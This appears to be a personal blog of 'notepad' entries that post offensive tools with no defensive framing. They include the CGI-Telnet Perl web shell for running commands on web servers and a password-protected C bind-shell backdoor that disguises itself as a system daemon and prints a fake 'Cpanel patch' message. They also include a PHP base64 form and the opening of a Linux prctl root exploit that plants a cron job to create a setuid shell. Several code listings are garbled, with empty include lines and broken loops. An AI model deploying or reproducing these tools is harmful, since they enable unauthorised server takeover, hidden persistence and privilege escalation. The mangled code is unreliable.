Welcome, Saudaraku


cgitelnet.txt
March 25, 2007, 3:19 pm
Filed under: notepad

#!/usr/bin/perl
#——————————————————————————
# Copyright and Licence
#——————————————————————————
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#——————————————————————————

#——————————————————————————
# Installation
#——————————————————————————
# To install this script
#
# 1. Modify the first line “#!/usr/bin/perl” to point to the correct path on
# your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you’re running the script under Windows NT, set $WinNT = 1 in the
# Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
# the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#——————————————————————————

#——————————————————————————
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#——————————————————————————
$Password = “ernasayang”; # Change this. You will need to enter this
# to login.

$WinNT = 0; # You need to change the value of this to 1 if
# you’re running this script on a Windows NT
# machine. If you’re running it on Unix, you
# can leave the value as it is.

$NTCmdSep = “&”; # This character is used to seperate 2 commands
# in a command line on Windows NT.

$UnixCmdSep = “;”; # This character is used to seperate 2 commands
# in a command line on Unix.

$CommandTimeoutDuration = 100; # Time in seconds after commands will be killed
# Don’t set this to a very large value. This is
# useful for commands that may hang or that
# take very long to execute, like “find /”.
# This is valid only on Unix servers. It is
# ignored on NT Servers.

$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
# browser as soon as it is output, otherwise
# it is buffered and send when the command
# completes. This is useful for commands like
# ping, so that you can see the output as it
# is being generated.

# DON’T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU’RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? “cd” : “pwd”);
$PathSep = ($WinNT ? “\\” : “/”);
$Redirector = ($WinNT ? ” 2>&1 1>&2″ : ” 1>&1 2>&1″);

#——————————————————————————
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{‘f’} and the data is stored in $in{‘filedata’}.
# Other variables can be accessed using $in{‘var’}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#——————————————————————————
sub ReadParse
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);

$MultipartFormData = $ENV{‘CONTENT_TYPE’} =~ /multipart\/form-data; boundary=(.+)$/;

if($ENV{‘REQUEST_METHOD’} eq “GET”)
{
$in = $ENV{‘QUERY_STRING’};
}
elsif($ENV{‘REQUEST_METHOD’} eq “POST”)
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{‘CONTENT_LENGTH’});
}

# handle file upload data
if($ENV{‘CONTENT_TYPE’} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = ‘–’.$1; # please refer to RFC1867
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $’;
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{‘filedata’} = $Body;
$Header =~ /filename=\”(.+)\”/;
$in{‘f’} = $1;
$in{‘f’} =~ s/\”//g;
$in{‘f’} =~ s/\s//g;

# parse trailer
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\”(\w+)\”/;
$key = $1;
$val = $’;
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack(“c”, hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack(“c”, hex($1))/ge;
$val =~ s/%(..)/pack(“c”, hex($1))/ge;
$in{$key} .= “” if (defined($in{$key}));
$in{$key} .= $val;
}
}
}

#——————————————————————————
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#——————————————————————————
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/’%’.unpack(“H*”,$1)/eg;
print “Content-type: text/html\n\n”;
print <<END;

$HtmlMetaHeader

# CGI-Telnet Version 1.0 – Connected to $ServerName

Upload File |
Download File |
Disconnect |
Help


END
}

#——————————————————————————
# Prints the Login Screen
#——————————————————————————
sub PrintLoginScreen
{
$Message = q$ 

 _____  _____  _____          _____        _               _
/  __ \|  __ \|_   _|        |_   _|      | |             | |
| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
 \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0

                      ______             � 2001, Rohitab Batra
                   .-"      "-.
                  /            \
                 |              |
                 |,  .-.  .-.  ,|
                 | )(_o/  \o_)( |
                 |/     /\     \|
       (@_       (_     ^^     _)
  _     ) \_______\__|IIIIII|__/_______________________
 (_)@8@8{}<________|-\IIIIII/-|________________________>
        )_/        \          /
       (@           `--------`
             W A R N I N G: Private Server

$;
#’
print <<END;

Trying $ServerName...
Connected to $ServerName
Escape character is ^]
$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <<END;


login: admin
password:
Login incorrect


END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <<END;

login: admin
password:


END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "Connection closed by foreign host.

";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
}
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;

$Prompt


END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;

$Prompt download

Filename:

Download:


END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;

$Prompt upload

Filename:

Options:  
Overwrite if it Exists

Upload:   


END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <<END;


Command exceeded maximum time of $CommandTimeoutDuration second(s).

Killed it!

END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
{
# we change the directory internally. The output of the
# command is not displayed.

$OldDir = $CurrentDir;
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
print "$Prompt $RunCommand";
}
else # some other command, display the output
{
&PrintPageHeader("c");
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print "$Prompt $RunCommand";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput) # show output as it is generated
{
$|=1;
$Command .= " |";
open(CommandOutput, $Command);
while()
{
$_ =~ s/(\n|\r\n)$//;
print "$_\n";
}
$|=0;
}
else # show output after command completes
{
print `$Command`;
}
if(!$WinNT)
{
alarm(0);
}
print "";
}
&PrintCommandLineInputForm;
&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------

Leave a Comment


bind.c
March 17, 2007, 8:28 pm
Filed under: notepad

#define HOME “/”
#define TIOCSCTTY 0×540E
#define TIOCGWINSZ 0×5413
#define TIOCSWINSZ 0×5414
#define ECHAR 0×1d
#define PORT 3100
#define BUF 32768
#define proc “/usr/libexec/courier-authlib/authdaemond” /*Change this for Fake BG proces */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct winsize {
unsigned short ws_row;
unsigned short ws_col;
unsigned short ws_xpixel;
unsigned short ws_ypixel;
};

int sc;
char passwd[] = “letjen123″; /* Change The password */
char motd[] =”=- cpanel login -=\n”;

void cb_shell() {
char buffer[150];

write(sc, “Password: “, 10);
read(sc, buffer, sizeof(buffer));
if (!strncmp(buffer, passwd, strlen(passwd))) {
write(sc, motd, sizeof(motd));
}
else {
write(sc, “DiE!!!\n”, 7);
close(sc); exit(0);
}
}

/* creates tty/pty name by index */
void get_tty(int num, char *base, char *buf)
{
char series[] = “pqrstuvwxyzabcde”;
char subs[] = “0123456789abcdef”;
int pos = strlen(base);
strcpy(buf, base);
buf[pos] = series[(num >> 4) & 0xF];
buf[pos+1] = subs[num & 0xF];
buf[pos+2] = 0;
}

/* search for free pty and open it */
int open_tty(int *tty, int *pty)
{
char buf[512];
int i, fd;

fd = open(“/dev/ptmx”, O_RDWR);
close(fd);

for (i=0; i < 256; i++) {
get_tty(i, “/dev/pty”, buf);
*pty = open(buf, O_RDWR);
if (*pty < 0) continue;
get_tty(i, “/dev/tty”, buf);
*tty = open(buf, O_RDWR);
if (*tty < 0) {
close(*pty);
continue;
}
return 1;
}
return 0;
}

/* to avoid creating zombies ;) */
void sig_child(int i)
{
signal(SIGCHLD, sig_child);
waitpid(-1, NULL, WNOHANG);
}

void hangout(int i)
{
kill(0, SIGHUP);
kill(0, SIGTERM);
}

int main (int argc, char *argv[])
{

int pid;
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;
char cmd[256];
strcpy (argv[0], proc);
signal (SIGCHLD, SIG_IGN);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror(“socket”);
return 1;
}

bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(PORT);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
perror(“bind”);
return 1;
}
if (listen(sock, 5) < 0) {
perror(“listen”);
return 1;
}
printf(“Cpanel patch is starting Indonoc 2007″); fflush(stdout);
pid = fork();
if (pid !=0 ) {
printf(“OK, pid = %d\n”, pid);
printf(“Cpanelx patch finis\n”);
return 0;
}

/* daemonize */
setsid();
chdir(“/”);
pid = open(“/dev/null”, O_RDWR);
dup2(pid, 0);
dup2(pid, 1);
dup2(pid, 2);
close(pid);
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, sig_child);
while (1) {
int scli;
int slen;
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli, &slen);
if (scli = MAXENV) || (i scli) ? (pty+1) : (scli+1),
&fds, NULL, NULL, NULL) < 0)
{
break;
}
if (FD_ISSET(pty, &fds)) {
int count;
count = read(pty, buf, BUF);
if (count <= 0) break;
if (write(scli, buf, count) <= 0) break;
}
if (FD_ISSET(scli, &fds)) {
int count;
unsigned char *p, *d;
d = buf;
count = read(scli, buf, BUF);
if (count 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(scli, &wb[rlen], 5 – rlen);
}

/* setup window */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] < 0) write(pty, p+5, rlen);
} else
if (write(pty, d, count) <= 0) break;

}
}
close(scli);
close(sock);
close(pty);
waitpid(subshell, NULL, 0);
vhangup();
exit(0);
}
close(scli);
}
}

Leave a Comment


base64.txt ( encode )
March 9, 2007, 11:45 pm
Filed under: notepad

base64_encode
base64_decode

Masukkan di sini

<?
$kata=$_POST[kata];
$base=$_POST[base];
if(isset($kata)){
echo “Hasil
“;
}
?>

Leave a Comment


prctl.c
March 4, 2007, 10:26 am
Filed under: notepad

/* Linux >= 2.6.13 prctl kernel exploit
*
* (C) Julien TINNES
*
* If you read the Changelog from 2.6.13 you’ve probably seen:
* [PATCH] setuid core dump
*
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE.
*
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define CROND “/etc/cron.d”
#define BUFSIZE 2048

struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

char crontemplate[]=
“#/etc/cron.d/core suid_dumpable exploit\n”
“SHELL=/bin/sh\n”
“PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n”
“#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n”;

char cronstring[BUFSIZE];
char fname[BUFSIZE];

struct timeval te;

void sh(int sn) {
execl(fname, fname, (char *) NULL);
}

int main(int argc, char *argv[]) {

int nw, pid;

if (geteuid() == 0) {
printf(“[+] getting root shell\n”);
setuid(0);
setgid(0);
if (execl(“/bin/sh”, “/bin/sh”, (char *) NULL)) {

Leave a Comment